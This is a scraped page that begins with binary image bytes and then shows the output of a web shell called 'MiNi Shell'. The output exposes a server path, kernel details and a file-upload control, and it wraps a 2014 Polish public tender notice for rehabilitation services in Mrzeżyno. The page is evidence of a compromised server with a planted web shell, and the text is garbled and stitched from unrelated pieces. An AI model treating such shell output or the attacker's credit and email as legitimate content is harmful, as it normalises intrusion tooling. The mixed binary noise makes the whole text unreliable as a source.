JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140328/106258-N-2014.html

<p class="kh_header"><b>Szczecin: Świadczenie w pomieszczeniach zamawiającego zlokalizowanych w Ośrodku Wczasowo - Rehabilitacyjnym Agawa przy ul. Śliskiej 5 w Mrzeżynie usług rehabilitacyjnych na rzecz uczestników turnusów rehabilitacyjnych i wskazanych przez zamawiającego osób, które posiadają wykupiony u zamawiającego pakiet usług rehabilitacyjnych.</b><br>
<b>Numer ogłoszenia: 106258 - 2014; data zamieszczenia: 28.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nieruchomości i Opłaty Lokalne Sp. z o.o. , ul. Czesława 9, 71-804 Szczecin, woj. zachodniopomorskie, tel. 91 421 63 23, faks 91 421 63 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie w pomieszczeniach zamawiającego zlokalizowanych w Ośrodku Wczasowo - Rehabilitacyjnym Agawa przy ul. Śliskiej 5 w Mrzeżynie usług rehabilitacyjnych na rzecz uczestników turnusów rehabilitacyjnych i wskazanych przez zamawiającego osób, które posiadają wykupiony u zamawiającego pakiet usług rehabilitacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie w pomieszczeniach zamawiającego zlokalizowanych w Ośrodku Wczasowo - Rehabilitacyjnym Agawa przy ul. Śliskiej 5 w Mrzeżynie usług rehabilitacyjnych na rzecz uczestników turnusów rehabilitacyjnych i wskazanych przez zamawiającego osób, które posiadają wykupiony u zamawiającego pakiet usług rehabilitacyjnych.
2. Zakres usług rehabilitacyjnych świadczonych na rzecz:
1) uczestników 14 - dniowych turnusów rehabilitacyjnych wynosi trzy zabiegi rehabilitacyjne dziennie (30 zabiegów w turnusie),
2) uczestników 9 - dniowych turnusów rehabilitacyjnych wynosi trzy zabiegi rehabilitacyjne dziennie (24 zabiegi w turnusie),
3) osób, które posiadają wykupiony u zamawiającego pakiet usług rehabilitacyjnych 
4) Rodzaj zabiegów dla poszczególnych osób określa lekarz zamawiającego i zmiana może być dokonana jedynie za zgodą lekarza.
3. Wykonawca zapewni wykonywanie następujących rodzajów zabiegów rehabilitacyjnych:
1) Gimnastyka lecznicza,
2) Gimnastyka indywidualna i zbiorowa,
3) UGUL, siłownia, suchy basen,
4) Inhalacje indywidualne,
5) Masaż wirowy kończyn górnych i dolnych,
6) Laser,
7) Tlenoterapia,
8) Hydromasaż,
9) Masaż wodny - aquavibron,
10) Masaż klasyczny,
11) Masaż wibracyjny fotele do masażu, leżanka,
12) Naświetlanie lampą solux,
13) Magnetoterapia - BEMER 3000,
14) Diatronik - prądy diadynamiczne,
15) Okłady cieplne,
16) Lampa polaryzacyjna.
Zakres wykonywanych zabiegów może zostać zwiększony o wykonywanie zabiegów przy użyciu ultradźwięków.

4. Usługi rehabilitacyjne będą świadczone przez pracowników wykonawcy w okresie od 30 kwietnia 2014 r. do 11 października 2014 r. Usługi te świadczone będą od poniedziałku do soboty.
5. Zamawiający przewiduje, że w okresie określonym w pkt. 4 zabiegami rehabilitacyjnymi objęte zostanie:
1) ca 900 osób, a każdy uczestnik 14 - dniowego turnusu rehabilitacyjnego poddany zostanie 30 zabiegom (3 zabiegi rehabilitacyjne dziennie), których odpowiedni zestaw wyznaczał będzie lekarz zgodnie z potrzebami wynikającymi ze schorzeń każdego pacjenta,
2) ca 80 osób, a każdy uczestnik 9 - dniowego turnusu rehabilitacyjnego poddany zostanie 24 zabiegom, których odpowiedni zestaw wyznaczał będzie lekarz zgodnie z potrzebami wynikającymi ze schorzeń każdego pacjenta,
3) ca 75 osób wskazanych przez Zamawiającego, które wykupią u zmawiającego pakiet usług rehabilitacyjnych. Zamawiający przewiduje, że każda osoba poddana zostanie 15 zabiegom, których odpowiedni zestaw wyznaczał będzie lekarz zgodnie z potrzebami wynikającymi ze schorzeń każdego pacjenta,
4) ca 100 osób wskazanych przez zamawiającego, które wykupią u zmawiającego pakiet usług rehabilitacyjnych. Zamawiający przewiduje, że każda osoba poddana zostanie 7 zabiegom,
5) ca 50 osób wskazanych przez zamawiającego, które wykupują u zamawiającego pakiet usług rehabilitacyjnych. Zamawiający przewiduje, że każda osoba poddana zostanie 3 zabiegom.
6. Z uwagi na specyfikę przedmiotu zamówienia ilości usług określonych pkt 5 są ilościami szacunkowymi, przewidywanymi przez zamawiającego i mogą ulec zmianie, w zależności od faktycznych jego potrzeb. Zamawiający zastrzega, że faktyczna ilość usług wchodzących w zakres umowy może być niższa od ilości podanej w postępowaniu o udzielenie zamówienia. Zmniejszenie liczby usług rehabilitacyjnych nie uprawnia wykonawcy do odszkodowania.
7. Realizacja przedmiotu zamówienia będzie wykonywana do czasu obowiązywania umowy lub do wykorzystania środków finansowych przeznaczonych na to zamówienie.
8. Usługi rehabilitacyjne wykonywane będą w pomieszczeniach zamawiającego i przy użyciu jego urządzeń, sprzętu i wyposażenia.
9. Pomieszczenia, którymi dysponuje zamawiający, są przystosowane do świadczenia usług rehabilitacyjnych i są wyposażone w sprzęt rehabilitacyjny umożliwiający prawidłowe przeprowadzanie zabiegów wymaganych przez zamawiającego. Wykonawca może wprowadzić do pomieszczeń zamawiającego swoje urządzenia do wykonywania zabiegów rehabilitacyjnych. 
10. Zamawiający przekaże wykonawcy w bezpłatne użytkowanie pomieszczenia, urządzenia sprzęt rehabilitacyjny oraz udostępni na swój koszt energię elektryczną i cieplną, wodę i odprowadzanie ścieków oraz wywóz odpadów komunalnych a także zapewni utrzymanie czystości pomieszczeń, sprzętu i wyposażenia. 
11. Wszelkie naprawy sprzętu wykonawca wykonywał będzie na koszt własny. Po wykonanej naprawie Wykonawca przedstawi Zamawiającemu dokument potwierdzający sprawność sprzętu.
12. Wykonawca zabezpieczy niezbędne do wykonywania zabiegów rehabilitacyjnych medykamenty i materiały.
13. Wykonawca prowadzić będzie dokumentację medyczną z przeprowadzanych usług rehabilitacyjnych tj. kart zabiegowych i imiennych list osób, którym wykonywano zabiegi rehabilitacyjne i zapewni przekazywania jej zamawiającemu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium należy wnieść w wysokości 1.000 zł (słownie złotych: jeden tysiąc) w terminie do dnia 7 kwietnia 2014 r. do godz. 09:00. Decyduje data wpływu środków do zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, iż wykonywał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jedną usługę główną. Za usługę główną zamawiający uzna: wykonywanie usług rehabilitacji leczniczej, dla jednego podmiotu zlecającego te usługi; o wartości nie niższej niż 50.000 PLN brutto, 
Wartości podane w walucie innej niż PLN w dokumentach potwierdzających spełnienie ww. warunku, będą przeliczane na PLN według średniego kursu Narodowego Banku Polskiego ogłoszonego w dniu opublikowania ogłoszenia o zamówieniu w Biuletynie zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować wyznaczonymi do realizacji niniejszego zamówienia minimum 4 osobami z wymaganym wykształceniem, z co najmniej rocznym stażem pracy, w tym z uprawnieniami w zakresie rehabilitacji leczniczej lub fizjoterapii</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada ubezpieczenie deliktowe odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 100.000 PLN, wraz z potwierdzeniem dokonania opłacenia ubezpieczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
w przypadku składania oferty wspólnej należy złożyć jeden dokument
2) odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2 siwz lub w przypadku składania oferty wspólnej (Rozdz. III pkt 1 siwz
3) oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, którą wykonawca powierza podwykonawcy (jeżeli wykonawca przewiduje udział podwykonawców);
w przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.niol.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nieruchomości i Opłaty Lokalne Sp. z o.o. w Szczecinie, ul. Czesława 9, 71-504 Szczecin (pok. 21 A).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2014 godzina 09:00, miejsce: Nieruchomości i Opłaty Lokalne Sp. z o.o. w Szczecinie, ul. Czesława 9, 71-504 Szczecin, (pok. 24 sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com